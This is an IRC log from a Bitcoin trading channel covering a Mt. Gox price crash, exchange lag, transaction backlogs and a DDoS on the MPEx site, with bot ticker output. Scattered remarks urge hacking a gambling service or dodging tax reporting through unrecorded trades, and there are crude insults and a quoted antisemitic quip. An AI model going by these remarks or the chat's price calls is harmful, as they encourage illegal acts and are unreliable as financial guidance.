01:34:41 i personally blame nefario Mar 07 01:34:58 I heard kim dotcom is dumping Mar 07 01:35:11 jesus you dont want to be near that guy when he dumps Mar 07 01:35:17 Kutcher is still in though right? Mar 07 01:35:44 49.09, the high of 2013 Mar 07 01:35:47 see ya folks Mar 07 01:35:49 oh yeah theres a bitcoin movie called dude where my coins announced too Mar 07 01:36:10 ugh... fucking whitehouse.gov, that ain't interesting Mar 07 01:36:12 (15:34) < dub> I heard kim dotcom is dumping << and if you believe btctalk, he's changing his name to kim bitcoin Mar 07 01:36:16 lol Mar 07 01:36:32 haha Mar 07 01:36:37 he should Mar 07 01:36:39 why not to bit kimdoing Mar 07 01:36:44 yeah, Dude, where's my Bitcoins? Mar 07 01:36:53 kim bit Mar 07 01:37:02 Sold at 48.98 Mar 07 01:37:05 bit baitboom Mar 07 01:37:11 and 48.5 Mar 07 01:37:17 kimdotcomcoin Mar 07 01:37:35 and 48.0, 47.98, 46.5 46, 40.5, 40, 35.0 etc Mar 07 01:37:54 ;;ticker Mar 07 01:37:55 BTCUSD ticker | Best bid: 43.93469, Best ask: 43.95602, Bid-ask spread: 0.02133, Last trade: 43.93469, 24 hour volume: 122933.59660769, 24 hour low: 40.01120, 24 hour high: 49.09900, 24 hour vwap: 45.23253 Mar 07 01:38:02 Tsk Mar 07 01:38:07 time to buy Mar 07 01:38:26 i think 40 is floor maybe? unless more of the same tomorrow. Mar 07 01:38:28 we have erased half of today's gains Mar 07 01:38:34 oh yes Mar 07 01:38:37 this is actually a flash crash Mar 07 01:38:37 $36 Mar 07 01:38:39 but it was a 10 dollar day Mar 07 01:38:39 50 later Mar 07 01:38:45 or more Mar 07 01:38:54 The weekend is coming Mar 07 01:38:54 you think 36 is settling? Mar 07 01:39:01 nah, I think we go back up Mar 07 01:39:11 this is awesome Mar 07 01:39:12 maybe we will touch 36 Mar 07 01:39:16 buy now Mar 07 01:39:17 i know. I think we do to, if only after the weekend and the media gets through Mar 07 01:39:20 see a big surge in a hour Mar 07 01:39:23 I just wanted to take some profits Mar 07 01:39:26 people will be catching on again Mar 07 01:39:29 been holding since $2.65 Mar 07 01:39:29 smart man Mar 07 01:39:35 whats going on with mpex Mar 07 01:39:36 really Mar 07 01:39:36 lol Mar 07 01:39:37 wtf Mar 07 01:39:39 can always buy in again at 36 Mar 07 01:39:45 I have an order Mar 07 01:39:46 if it goes there Mar 07 01:39:47 Bowjob http://mpex.coinbr.com/ Mar 07 01:39:50 obama TFW Mar 07 01:39:51 i bet you do! Mar 07 01:40:04 but I need to figure out this wash sale shit with long term vs. short term cap gains Mar 07 01:40:06 lol Mar 07 01:40:08 wow Mar 07 01:40:09 xD Mar 07 01:40:13 kimdotcom just dumped Mar 07 01:40:15 Don't want to be taxed at 39.6% Mar 07 01:40:17 and it was nasty Mar 07 01:40:21 ;;ticker Mar 07 01:40:22 BTCUSD ticker | Best bid: 42.86000, Best ask: 43.00000, Bid-ask spread: 0.14000, Last trade: 42.86000, 24 hour volume: 123951.17643418, 24 hour low: 40.01120, 24 hour high: 49.09900, 24 hour vwap: 45.21823 Mar 07 01:41:11 10k to go back to 43 Mar 07 01:41:16 49* Mar 07 01:41:19 meh Mar 07 01:41:25 not really a huge dump Mar 07 01:41:37 just wait Mar 07 01:41:46 So where's my MPEx now? Mar 07 01:41:59 Bugpowder_ actually tax thing is a major disincentive to selling for many ppl. Mar 07 01:41:59 shouldn't S.DICE be rallying right about now??? Mar 07 01:42:08 mircea_popescu: no shit! Mar 07 01:42:21 How tha fuc am I gonna get my Tesla Mar 07 01:42:29 if I'm taxed at income Mar 07 01:42:33 S.DICE can't rally if MPEx is unavailable Mar 07 01:42:33 + state Mar 07 01:43:01 Now my mtgox account is getting moved to US Mar 07 01:43:05 FATCA is in effect Mar 07 01:43:11 FBAR is in effect Mar 07 01:43:22 can't hide those transactions, gotta report it. Mar 07 01:43:35 or risk the wrath of IRS Mar 07 01:43:37 sucks to be you. Mar 07 01:43:48 I cry myself to sleep Mar 07 01:43:52 make a plan, determine where/what denomination/ how to store your wealth. Find property, do the research to dtermine best course of action. Mar 07 01:44:05 that's terrible Bug Mar 07 01:44:07 and S.DICE isn't unavailble, the mpex.coinbr.com is processing orders Mar 07 01:44:11 just do irl transactions, no record Mar 07 01:44:17 any americans want acces to a mtgox account? Mar 07 01:44:19 well, at least my stat went through anyway Mar 07 01:44:24 I can't connect to mpex.coinbr.com Mar 07 01:44:29 I am selling below gox on localbitcoins Mar 07 01:44:35 in a major metro area Mar 07 01:44:40 well Mar 07 01:44:45 not below gox right now :) Mar 07 01:44:45 where? Mar 07 01:44:50 DC Mar 07 01:44:51 works fine for me Namworld, just tried it again Mar 07 01:44:55 mmk Mar 07 01:44:56 ;;ticker Mar 07 01:44:58 BTCUSD ticker | Best bid: 42.43692, Best ask: 42.90000, Bid-ask spread: 0.46308, Last trade: 42.43692, 24 hour volume: 124522.10296094, 24 hour low: 40.01120, 24 hour high: 49.09900, 24 hour vwap: 45.20818 Mar 07 01:45:06 o le wow. Mar 07 01:45:15 Bugpowder i have a mtgox account Mar 07 01:45:19 I have one too Mar 07 01:45:21 want to go through me? Mar 07 01:45:24 no Mar 07 01:45:27 http://coinlab.com/ Mar 07 01:45:27 i'm not us resident Mar 07 01:45:34 look at the sell off Mar 07 01:45:36 I don't want to get fucked Mar 07 01:45:39 not worth the risk Mar 07 01:45:43 I don't have tools to trade on it I mean. I could do it manually tho Mar 07 01:45:51 ahh. Mar 07 01:46:05 you're going to get fucked by coinlab anyway Mar 07 01:46:11 I told all my friends to sell this morning too. Mar 07 01:46:12 some did Mar 07 01:46:13 while still wearing your pants Mar 07 01:46:25 at least i remove your pants first Mar 07 01:46:25 it will prob bounce though Mar 07 01:46:37 i think we're gonna retrace down to say $35, and the rally will continue Mar 07 01:46:40 yeah Mar 07 01:46:45 [MPEX] [O.BTCUSD.P750T] 1000 @ 0.85433966 = 854.3397 BTC [-] Mar 07 01:46:49 I dunno Mar 07 01:46:50 UH OH Mar 07 01:46:55 oho Mar 07 01:47:00 boys and girls... this looks like the end. Mar 07 01:47:01 when news hits that the network is broken.. Mar 07 01:47:12 its gonna be a fire sale Mar 07 01:47:17 network is broken? Mar 07 01:47:25 im still long term bullish. if it goes down low, i'll just BTFD :D Mar 07 01:48:04 and I don't think the network is "broken" its just piling up with tx's Mar 07 01:48:08 Bowjob: block size limit hit, transactiosn are piling up Mar 07 01:48:14 so one guy was asking to increase the block size Mar 07 01:48:24 i vote ban S.Dice for the meantime Mar 07 01:48:25 That put short was profitable though right? Mar 07 01:48:28 then fix the blocksize Mar 07 01:48:34 then let dice have its fill Mar 07 01:48:53 or at least make the bets 1 BTC min Mar 07 01:48:56 stop the dust Mar 07 01:48:57 [MPEX] [O.BTCUSD.C330T] 1000 @ 0.27233775 = 272.3378 BTC [-] Mar 07 01:48:58 [MPEX] [O.BTCUSD.C310T] 1000 @ 0.31662031 = 316.6203 BTC [+] Mar 07 01:48:58 how much of dice profits are from bets below .1? Mar 07 01:49:04 not a lot Mar 07 01:49:08 I think a healthy return to $2 first Mar 07 01:49:13 is what we need Mar 07 01:49:16 its below 4 BTC from doogs Mar 07 01:49:18 chart Mar 07 01:49:21 and when I say we I mean I Mar 07 01:49:24 shake out the weak hands Mar 07 01:49:26 lol Mar 07 01:49:32 Bugpowder_ the put short was sold 1.3-1.1 iirc Mar 07 01:49:36 s.dice should pay higher fees Mar 07 01:49:36 yeah Mar 07 01:49:39 spamming cents Mar 07 01:49:48 s.deuce is paying higher fees as of today Mar 07 01:49:57 s.douche Mar 07 01:50:05 its part of the problem Mar 07 01:50:10 s stands for spam Mar 07 01:50:22 instead of only their txn stalling errybodys are Mar 07 01:50:39 nobody can afford to outpay s.dice Mar 07 01:50:44 maybe s.dice could charge a rpx for bets Mar 07 01:50:48 consequently, all the libertards will get pushed out of bitcoin Mar 07 01:50:49 42.00 Mar 07 01:50:51 i'm rejoicing. Mar 07 01:50:54 someone should hax them for a week Mar 07 01:51:04 mircea why rejoicing? Mar 07 01:51:08 i'm sick of sitting at cafes for 4 hours waiting for a transaction to confirm Mar 07 01:51:12 [BTCTC] [GOLD] 2 @ 0.3428 = 0.6856 BTC [-] Mar 07 01:51:21 this is such a bear day Mar 07 01:51:27 i cant bear to watch this bullshit Mar 07 01:51:31 [MPEX] [O.BTCUSD.C330T] 1000 @ 0.27169201 = 271.692 BTC [-] Mar 07 01:51:33 [MPEX] [O.BTCUSD.C310T] 1000 @ 0.3160137 = 316.0137 BTC [-] Mar 07 01:51:51 definitely covering Mar 07 01:52:03 yup Mar 07 01:52:06 [HAVELOCK] [HIM] 1 @ 1.5300001 BTC [-] Mar 07 01:52:08 41.93 Mar 07 01:52:12 [MPEX] [O.BTCUSD.P750T] 1000 @ 0.85593586 = 855.9359 BTC [+] Mar 07 01:52:23 The dude finally made a profit Mar 07 01:52:26 nice race too, i wonder how much they manage to squeeze through Mar 07 01:52:39 Bugpowder_ he made pretty good loot, .3-4 over what, 15k ? Mar 07 01:52:46 yeah Mar 07 01:52:57 mircea Mar 07 01:52:57 [BTCTC] [BASIC-MINING] 15 @ 0.344 = 5.16 BTC [+] Mar 07 01:52:58 is 24hprc even dropping yet? Mar 07 01:53:00 are u seeing this? Mar 07 01:53:02 actuallly i think the calls are slightly ahead too Mar 07 01:53:05 BitHub "this" Mar 07 01:53:08 otc room lulz Mar 07 01:53:12 im not in -otc Mar 07 01:53:31 oh man its so lulz Mar 07 01:53:51 dump dump dump USD Mar 07 01:54:27 <+starsoccer> wtf do you mean cia snitch Mar 07 01:54:32 so which txns were stalled? All mine went thru? Mar 07 01:54:50 starsoccer is a scammer Mar 07 01:54:54 and for some reason, an op Mar 07 01:54:54 http://bitbet.us/bet/283/btc-usd-at-mtgox-will-hit-50-in-march/ Mar 07 01:55:02 mircea got raided - lul Mar 07 01:55:03 lots of free btc here Mar 07 01:55:08 mod6 bitcoin-otc "selective evaporation" succeeded. Mar 07 01:55:16 :] Mar 07 01:55:19 if anyone wonders why gmaxwell is an idiot, that's it right there. Mar 07 01:55:41 people are really getting upset in otc mircea Mar 07 01:55:47 they think you're really gone haha Mar 07 01:55:51 lol Mar 07 01:56:01 that they don't know about this chan i can see Mar 07 01:56:02 i should paste bin it for you Mar 07 01:56:08 but they don't know twitter, either ? anything ? Mar 07 01:56:13 so go ahead. Mar 07 01:56:23 i've never used it Mar 07 01:56:40 its funny as hell tho, main topic of discussion atm Mar 07 01:56:46 someone is clearly dumping Mar 07 01:56:48 no dandan fled, they were just spreading disinformation Mar 07 01:56:53 i set 'em straight Mar 07 01:57:04 [HAVELOCK] [HIM] 1 @ 1.5300001 BTC [-] Mar 07 01:57:08 what happened to mpex.co Mar 07 01:57:11 I tried :( [18:55] bitcoinbubble: jews did mpex Mar 07 01:57:16 Oooohhh yeah Mar 07 01:57:19 41.12 Mar 07 01:57:27 o boy. Mar 07 01:57:30 lul dub Mar 07 01:57:34 i saw some of those Mar 07 01:57:38 5k BTC purchase and we'd be back to 48... thin line... Mar 07 01:57:55 I'm not sure we're done rising yet. Mar 07 01:57:59 (15:53) <+mod6> (15:52) < danieldaniel> MPEX is gone << DDOS brought down the main site, you can get to it here: mpex.coinbr.com Mar 07 01:58:05 [HAVELOCK] [SDICE] 2 @ 0.47 = 0.94 BTC [+] Mar 07 01:58:07 [HAVELOCK] [SDICE] 8 @ 0.47 = 3.76 BTC [+] Mar 07 01:58:11 did mpex guy run off with the money? Mar 07 01:58:13 lul! Mar 07 01:58:34 ;;goxlag Mar 07 01:58:37 471.638897 seconds Mar 07 01:58:40 ;;ticker Mar 07 01:58:44 BTCUSD ticker | Best bid: 41.11111, Best ask: 41.50000, Bid-ask spread: 0.38889, Last trade: 42.00000, 24 hour volume: 126252.65323883, 24 hour low: 40.14460, 24 hour high: 49.09900, 24 hour vwap: 45.18147 Mar 07 01:58:44 lol jesus it's gonna be a day soon Mar 07 01:58:50 :( Mar 07 01:58:56 just go to coinlab Mar 07 01:59:00 watch the dump Mar 07 01:59:09 http://bitcoinity.org/markets?theme=dark Mar 07 01:59:21 is doing well Mar 07 01:59:24 i like to watch it go up. Mar 07 01:59:24 "sell out to coinlab you know you want to" Mar 07 01:59:24 oh shi bitcoinity came back? Mar 07 01:59:37 lol Mar 07 01:59:38 ya Mar 07 02:00:04 they should have that on their site Mar 07 02:00:08 this is actually called a bear trap Mar 07 02:00:22 how so? Mar 07 02:00:25 7 minute lag Mar 07 02:00:27 LOL Mar 07 02:00:33 ;;goxlag Mar 07 02:00:37 505.11974 seconds Mar 07 02:00:37 [MPEX] [S.DICE] 420 @ 0.0046 = 1.932 BTC [-] Mar 07 02:00:40 5k buy then 48 Mar 07 02:00:40 holy crap Mar 07 02:00:40 fastcash4bitcoins suddenly has funds available to buy again Mar 07 02:00:40 lol Mar 07 02:00:52 I KNEW they just shut down buying into the blow off top Mar 07 02:00:58 heh all of a sudden hey bug Mar 07 02:00:58 they had funds all along :) Mar 07 02:01:09 Bugpowder_ prolly ppl sold to them tho Mar 07 02:01:26 mircea_popescu: Mar 07 02:01:32 Bot from them Mar 07 02:01:37 and only via bitcoinsdirect Mar 07 02:01:38 ;;ticker Mar 07 02:01:40 [MPEX] [O.BTCUSD.C330T] 1000 @ 0.27153039 = 271.5304 BTC [-] Mar 07 02:01:41 BTCUSD ticker | Best bid: 41.12100, Best ask: 41.90000, Bid-ask spread: 0.77900, Last trade: 41.02010, 24 hour volume: 126502.71591685, 24 hour low: 40.30100, 24 hour high: 49.09900, 24 hour vwap: 45.17366 Mar 07 02:01:42 [MPEX] [O.BTCUSD.C310T] 1000 @ 0.31586188 = 315.8619 BTC [-] Mar 07 02:01:45 which is an email based service, so I doubt it. Mar 07 02:01:47 hahahahahahahahahabaha Mar 07 02:01:51 we just hit under 41 Mar 07 02:01:55 its a market manipulator Mar 07 02:01:57 the algorithm worked!!!!! Mar 07 02:02:05 Annoyed that I didn't sell more Mar 07 02:02:05 [HAVELOCK] [SDICE] 2 @ 0.47 = 0.94 BTC [+] Mar 07 02:02:14 http://coinlab.com/ Mar 07 02:02:15 watch this Mar 07 02:02:16 Bugpowder_ i didn't sell any. Mar 07 02:02:22 didn't want trigger fatca Mar 07 02:02:24 check out the depth now though: http://bitcoincharts.com/markets/mtgoxUSD.html Mar 07 02:02:36 fuck that fuckta Mar 07 02:02:36 [MPEX] [O.BTCUSD.P750T] 1000 @ 0.85630842 = 856.3084 BTC [+] Mar 07 02:02:38 who cares Mar 07 02:02:38 lol Mar 07 02:02:40 i think we're going right backup Mar 07 02:02:53 we just hot $40 Mar 07 02:03:06 https://www.canadianbitcoins.com/ Mar 07 02:03:15 Canadian bitcoins.. buy $55.. sell $42 Mar 07 02:03:16 ol Mar 07 02:03:16 forty, wow. Mar 07 02:03:21 $39 Mar 07 02:03:26 10 minute lag... and bitcoincharts not with out either Mar 07 02:03:55 ;;market sell 10000 Mar 07 02:03:59 hmm... wonder if my mtgox bids actually got cancells Mar 07 02:04:02 or not Mar 07 02:04:04 ;;market sell 100000 Mar 07 02:04:05 A market order to sell 10000 bitcoins right now would net 392180.3720 USD and would take the last price down to 37.3000 USD, resulting in an average price of 39.2180 USD/BTC. | Data vintage: 0.0010 seconds Mar 07 02:04:06 A market order to sell 100000 bitcoins right now would net 2549350.7477 USD and would take the last price down to 14.0000 USD, resulting in an average price of 25.4935 USD/BTC. | Data vintage: 0.0106 seconds Mar 07 02:04:27 39.5 Mar 07 02:04:28 ick thank you gribble Mar 07 02:04:33 ooooh quite a difference Mar 07 02:04:57 !ticker m ^OIX Mar 07 02:05:04 42 is the real price Mar 07 02:05:19 I don't know those people, and they don't look very friendly. Mar 07 02:05:21 assbot.... Mar 07 02:05:31 ;;obip 1000 Mar 07 02:05:31 The weighted average price of BTC, 1000.0 coins up and down from the spread, is 41.38470 USD. | Data vintage: 86.2046 seconds Mar 07 02:05:37 i'm glad it's happening now. Mar 07 02:05:59 "^OIX": "7d": {"avg": "4746815366","min": "3024983876","max": "4950599490","vsh": "no","vsa": "1.89472677534E+12","cnt": ""} Mar 07 02:06:01 it's been too nuts lately. need some stability Mar 07 02:06:01 ftr. Mar 07 02:06:57 we still at 47 on OIX hmm Mar 07 02:07:08 you can still sell bitcoins at 47 dollars each Mar 07 02:07:09 [MPEX] [O.BTCUSD.P310T] 200 @ 0.05329654 = 10.6593 BTC [-] Mar 07 02:07:10 mircea - I thought you were in jail? Mar 07 02:07:10 i mean Mar 07 02:07:12 43. Mar 07 02:07:17 pssst, gox is falling Mar 07 02:07:18 doctor_pullfingr me ? Mar 07 02:07:36 seems the lag grows faster than clock time Mar 07 02:07:44 jurov cheeze Mar 07 02:07:48 ;;goxlag Mar 07 02:07:50 814.286864 seconds Mar 07 02:07:54 lol Mar 07 02:08:18 xD Mar 07 02:08:45 mpex deposits - faster than mtgox trading engine. Mar 07 02:08:52 36 does seem right Bugpowder_ Mar 07 02:09:07 then up from there Mar 07 02:09:35 kakobrekla ya but mtgox is free* Mar 07 02:09:59 mpex is free too Mar 07 02:10:08 its free to read. Mar 07 02:10:10 if you know the right people Mar 07 02:10:16 :) Mar 07 02:10:59 [MPEX] [O.BTCUSD.P750T] 1000 @ 0.85668542 = 856.6854 BTC [+] Mar 07 02:11:14 [MPEX] [O.BTCUSD.C330T] 1000 @ 0.27136871 = 271.3687 BTC [-] Mar 07 02:11:16 [MPEX] [O.BTCUSD.C310T] 1000 @ 0.31571 = 315.71 BTC [-] Mar 07 02:11:52 OOOOooooooo Mar 07 02:11:56 mircea_popescu: mpex seems inaccessible atm? Mar 07 02:12:06 so is coinbase out of btc? Mar 07 02:12:16 here we go Mar 07 02:12:17 28.5 Mar 07 02:12:20 38.5 Mar 07 02:12:22 hehehe Mar 07 02:12:22 haha Mar 07 02:12:24 nanotube main site is being ddosed. use proxies Mar 07 02:12:30 mpex.coinbr.com etc. Mar 07 02:12:30 >Bitcoin Price Reaches All-Time High after Mt. Gox Announces CoinLab Partnership Mar 07 02:12:36 yeah, i also farted twice before the high. Mar 07 02:12:56 So funny, coinlab didn't even have a chance to fuck it up Mar 07 02:12:59 mircea_popescu: ah, didn't know there were proxies. :) Mar 07 02:13:10 I wonder if my bids will get hit? Mar 07 02:13:44 nanotube https://twitter.com/Mircea_Popescu/status/309349518632157185 Mar 07 02:13:44 This is definitely a bad time for a market order Mar 07 02:13:48 seems for mtgox is easier to split US off than to fix their engine Mar 07 02:14:05 this trend could revert in an instead like all the previous rises Mar 07 02:14:16 Namworld true. Mar 07 02:14:22 will my bids clear in time to catch the dump? Mar 07 02:14:41 Namworld, the last 48 hours were very very simlar to last top Mar 07 02:14:46 rise of over $10 in a day Mar 07 02:14:59 ;;ticker Mar 07 02:15:02 eh, who knows Mar 07 02:15:03 BTCUSD ticker | Best bid: 39.89000, Best ask: 39.90000, Bid-ask spread: 0.01000, Last trade: 39.89000, 24 hour volume: 133904.00033926, 24 hour low: 38.30000, 24 hour high: 49.09900, 24 hour vwap: 44.87318 Mar 07 02:15:08 fuck Mar 07 02:15:27 broke the 40 like nothing Mar 07 02:15:32 the 36 is the real support though Mar 07 02:15:47 err 35 Mar 07 02:15:51 34 Mar 07 02:16:05 ya Mar 07 02:16:06 12 Mar 07 02:16:07 33 Mar 07 02:16:11 13.5 Mar 07 02:16:16 no, 34. Mar 07 02:16:30 34 from the chart, 33 from the bids Mar 07 02:17:26 ;;ticker Mar 07 02:17:28 BTCUSD ticker | Best bid: 38.25000, Best ask: 39.90000, Bid-ask spread: 1.65000, Last trade: 39.90000, 24 hour volume: 134097.13923724, 24 hour low: 38.25000, 24 hour high: 49.09900, 24 hour vwap: 44.85953 Mar 07 02:17:37 mircea_popescu: ah cool. so i presume your twitter will keep listing the latest proxies? Mar 07 02:17:48 nanotube if need be, yeah. or here. Mar 07 02:18:16 mmk Mar 07 02:18:18 this is what happens when 100 people hit SELL MARKET at the same time Mar 07 02:18:46 some bit now at 40.2 Mar 07 02:18:48 bid Mar 07 02:20:01 hello Mar 07 02:20:10 what's the damage? Mar 07 02:20:14 ;;ticker Mar 07 02:20:25 Error: Failure to retrieve ticker. Try again later. Mar 07 02:20:44 mtgox exploded Mar 07 02:20:47 40.4 is my best guess at the ticker Mar 07 02:21:01 and mpex? Mar 07 02:21:25 [MPEX] [O.BTCUSD.C350T] 1000 @ 0.23556839 = 235.5684 BTC [-] Mar 07 02:21:26 [MPEX] [O.BTCUSD.C330T] 1000 @ 0.26615673 = 266.1567 BTC [-] Mar 07 02:21:32 [MPEX] [O.BTCUSD.C310T] 1000 @ 0.3108139 = 310.8139 BTC [-] Mar 07 02:21:49 hctib ppl are covering long positions desperately for the past hour or so Mar 07 02:22:03 https://bitcointalk.org/index.php?topic=149803.msg1591395#msg1591395 Mar 07 02:22:08 nice read Mar 07 02:22:24 [MPEX] [O.BTCUSD.P750T] 1000 @ 0.86980593 = 869.8059 BTC [+] Mar 07 02:22:40 lol slush saw the mpex page and said "alpaca socks eshop was never hacked, too." Mar 07 02:22:52 ;;ticker Mar 07 02:23:16 BTCUSD ticker | Best bid: 39.89000, Best ask: 40.51000, Bid-ask spread: 0.62000, Last trade: 39.89000, 24 hour volume: 137698.19346541, 24 hour low: 38.00100, 24 hour high: 49.09900, 24 hour vwap: 44.72163 Mar 07 02:23:16 jurov yes but he's sore, cause he got linoded. Mar 07 02:23:43 mircea_popescu: what is your private key? Mar 07 02:23:46 lol Mar 07 02:23:49 but tell him i said his pool never saw as much btc as mpex saw this year alone. Mar 07 02:24:56 nice, bids finnally are open Mar 07 02:25:04 probably will bounce now :) Mar 07 02:25:12 ;;ticker Mar 07 02:25:16 ;;goxlag Mar 07 02:25:17 469.590851 seconds Mar 07 02:25:23 Error: Failure to retrieve ticker. Try again later. Mar 07 02:25:50 still whole infrastructure is falling apart Mar 07 02:25:54 when major movements happen Mar 07 02:26:08 unserious Mar 07 02:26:16 kakobrekla this is true. Mar 07 02:26:34 ;ticker Mar 07 02:26:48 ;;ticker Mar 07 02:26:49 BTCUSD ticker | Best bid: 38.00100, Best ask: 38.03130, Bid-ask spread: 0.03030, Last trade: 38.03130, 24 hour volume: 138552.24765830, 24 hour low: 37.90000, 24 hour high: 49.09900, 24 hour vwap: 44.68042 Mar 07 02:27:14 funny thing is, the 49-39 drop happened on 30k bitcoins worht of volume Mar 07 02:27:28 which is like jackshit Mar 07 02:28:00 http://bitcoincharts.com/charts/mtgoxUSD/accumulated_orderbook.png is STALE Mar 07 02:28:41 [BTCTC] [COGNITIVE] 10 @ 0.26 = 2.6 BTC [+] Mar 07 02:28:44 everything is broke Mar 07 02:28:48 txes dont get confirmed Mar 07 02:28:54 goxlag is days Mar 07 02:29:02 kakobrekla mpex trades! Mar 07 02:29:05 last price uknown Mar 07 02:29:07 a LOT more coin jsut showed up for sale Mar 07 02:29:15 unknown Mar 07 02:29:28 kakobrekla can't you just make assbot query proxy address? Mar 07 02:29:31 if it bounces its only gonna be for a minute Mar 07 02:30:07 some are born to sweet delight, some are born to endless night. Mar 07 02:30:38 fucking pastebin down too Mar 07 02:30:45 shit is fucked up Mar 07 02:31:12 dub, what do you mean it will only bounec for a minute? Mar 07 02:31:54 Why is your site redirecting to the whitehouse? I thought it was secure? Mar 07 02:31:54 Whitehouse was hacked. Mar 07 02:31:57 lmao Mar 07 02:32:09 I think some people realised they might miss out on selling at 50, a shitload more asks showed up there recently, presumably to catch teh bounce Mar 07 02:32:13 ;;ticker Mar 07 02:32:24 Error: Failure to retrieve ticker. Try again later. Mar 07 02:32:33 [MPEX] [O.BTCUSD.P750T] 1000 @ 0.87894633 = 878.9463 BTC [+] Mar 07 02:32:48 hold on tight, we are bouncing back Mar 07 02:32:57 [MPEX] [O.BTCUSD.C350T] 1000 @ 0.23360747 = 233.6075 BTC [-] Mar 07 02:32:59 [MPEX] [O.BTCUSD.C330T] 1000 @ 0.26253021 = 262.5302 BTC [-] Mar 07 02:33:01 panic selling and panic buying is always a bad idea Mar 07 02:33:01 [MPEX] [O.BTCUSD.C310T] 1000 @ 0.30740716 = 307.4072 BTC [-] Mar 07 02:33:07 after someone makes a fast trading engine Mar 07 02:33:10 tell it to the options ppl lol Mar 07 02:33:16 ;;ticker Mar 07 02:33:26 Error: Failure to retrieve ticker. Try again later. Mar 07 02:33:36 thats cuz someone dumped USD Mar 07 02:33:41 mtgox is becoming as useful as bitcoinica. Mar 07 02:33:42 it caused BTC to go billions Mar 07 02:33:44 I can't connect to mpex.co Mar 07 02:34:00 cant we have an anonymous exchange Mar 07 02:34:02 kakobrekla: perhaps something in teh /topic? Mar 07 02:34:06 hctib mpex.coinbr.com Mar 07 02:34:07 and an anonymous debit card Mar 07 02:34:09 .. Mar 07 02:34:14 thanks Mar 07 02:34:14 dub noone reads that Mar 07 02:34:27 but right now we cant go READ TEH FUCKING TOPIC Mar 07 02:34:48 dub misses his creature conforts. Mar 07 02:35:17 ;;ticker Mar 07 02:35:33 BTCUSD ticker | Best bid: 37.00000, Best ask: 38.00190, Bid-ask spread: 1.00190, Last trade: 37.00000, 24 hour volume: 142568.29851439, 24 hour low: 37.00000, 24 hour high: 49.09900, 24 hour vwap: 44.49249 Mar 07 02:35:51 [BTCTC] [BTC-TRADING-PT] 100 @ 0.1573 = 15.73 BTC [-] Mar 07 02:36:06 [HAVELOCK] [SDICE] 1 @ 0.465 BTC [-] Mar 07 02:38:07 i thought you were gonna go CAN'T ACCESS MPEX.CO : http://whitehouse.gov Mar 07 02:38:29 :p Mar 07 02:39:59 it'd sure be nice to trade on this Mar 07 02:41:27 oh hey gox farted out an update Mar 07 02:41:29 Mar07 00:33:45 mtgox x499 5,774.6084 @ 37.8195421 USD Mar 07 02:41:36 coinbr keeps getting mpex deposits as if nothing was happening Mar 07 02:42:00 [MPEX] [S.MPOE] 67800 @ 0.00073204 = 49.6323 BTC [-] Mar 07 02:42:01 [MPEX] [S.MPOE] 67800 @ 0.00073204 = 49.6323 BTC [-] Mar 07 02:42:03 [MPEX] [S.MPOE] 8573 @ 0.00074999 = 6.4297 BTC [+] Mar 07 02:42:04 [MPEX] [S.MPOE] 8573 @ 0.00074999 = 6.4297 BTC [+] Mar 07 02:42:06 [MPEX] [S.MPOE] 6515 @ 0.00074999 = 4.8862 BTC [+] Mar 07 02:42:15 [MPEX] [S.MPOE] 6515 @ 0.00074999 = 4.8862 BTC [+] Mar 07 02:42:16 [MPEX] [S.MPOE] 1817112 @ 0.00075 = 1362.834 BTC [+] Mar 07 02:42:18 [MPEX] [S.MPOE] 1817112 @ 0.00075 = 1362.834 BTC [+] Mar 07 02:42:19 [MPEX] [O.BTCUSD.P210T] 10 @ 0.05264551 = 0.5265 BTC [-] Mar 07 02:42:31 business.as.usual Mar 07 02:42:31 lol now there's an echo ? Mar 07 02:42:55 ;;ticker Mar 07 02:42:59 BTCUSD ticker | Best bid: 36.31000, Best ask: 37.00000, Bid-ask spread: 0.69000, Last trade: 36.31000, 24 hour volume: 146035.97593336, 24 hour low: 36.31000, 24 hour high: 49.09900, 24 hour vwap: 44.31001 Mar 07 02:43:21 damn Mar 07 02:44:11 i shoulda listned to bug that time Mar 07 02:44:11 lol Mar 07 02:45:31 [MPEX] [O.BTCUSD.P310T] 200 @ 0.05608295 = 11.2166 BTC [+] Mar 07 02:47:38 o nelly Mar 07 02:47:49 y hello Mar 07 02:47:53 [MPEX] [O.BTCUSD.C350T] 1000 @ 0.23340951 = 233.4095 BTC [-] Mar 07 02:47:55 [MPEX] [O.BTCUSD.C330T] 1000 @ 0.26219875 = 262.1988 BTC [-] Mar 07 02:47:59 [MPEX] [O.BTCUSD.C310T] 1000 @ 0.3070958 = 307.0958 BTC [-] Mar 07 02:48:05 [BTCTC] [ASICMINER-PT] 76 @ 0.65 = 49.4 BTC [-] Mar 07 02:48:06 [MPEX] [O.BTCUSD.P750T] 1000 @ 0.87975412 = 879.7541 BTC [+] Mar 07 02:48:42 mpex making banque Mar 07 02:48:58 mircea_popescu: http://www.youtube.com/watch?v=HruSsPKVjuc :P Mar 07 02:49:05 [HAVELOCK] [SDICE] 1 @ 0.45 BTC [-] Mar 07 02:49:16 s/copacul/bitcoinul/ Mar 07 02:49:17 [MPEX] [O.BTCUSD.C430T] 1000 @ 0.15664416 = 156.6442 BTC [-] Mar 07 02:49:18 [MPEX] [O.BTCUSD.C410T] 1000 @ 0.17343444 = 173.4344 BTC [-] Mar 07 02:49:23 [MPEX] [O.BTCUSD.C390T] 1000 @ 0.19179501 = 191.795 BTC [-] Mar 07 02:49:25 [MPEX] [O.BTCUSD.C370T] 1000 @ 0.2117738 = 211.7738 BTC [-] Mar 07 02:49:27 ohoho. capitulation eh Mar 07 02:49:27 [MPEX] [O.BTCUSD.C350T] 1000 @ 0.23340951 = 233.4095 BTC [-] Mar 07 02:49:32 [MPEX] [O.BTCUSD.C330T] 1000 @ 0.26219875 = 262.1988 BTC [-] Mar 07 02:49:35 [MPEX] [O.BTCUSD.C310T] 1000 @ 0.3070958 = 307.0958 BTC [-] Mar 07 02:50:57 ;;ticker Mar 07 02:51:01 gah Mar 07 02:51:03 fuck Mar 07 02:51:05 [HAVELOCK] [SDICE] 7 @ 0.425 = 2.975 BTC [-] Mar 07 02:51:08 BTCUSD ticker | Best bid: 36.31000, Best ask: 36.34608, Bid-ask spread: 0.03608, Last trade: 36.31000, 24 hour volume: 157207.79114001, 24 hour low: 33.83133, 24 hour high: 49.09900, 24 hour vwap: 43.69425 Mar 07 02:51:34 I should really go play a game or something, else I might do something stupid like buy in again too early. Mar 07 02:51:41 [BTCTC] [GOLD] 2 @ 0.4 = 0.8 BTC [+] Mar 07 02:51:56 i did some profit taking at 50 otc Mar 07 02:51:57 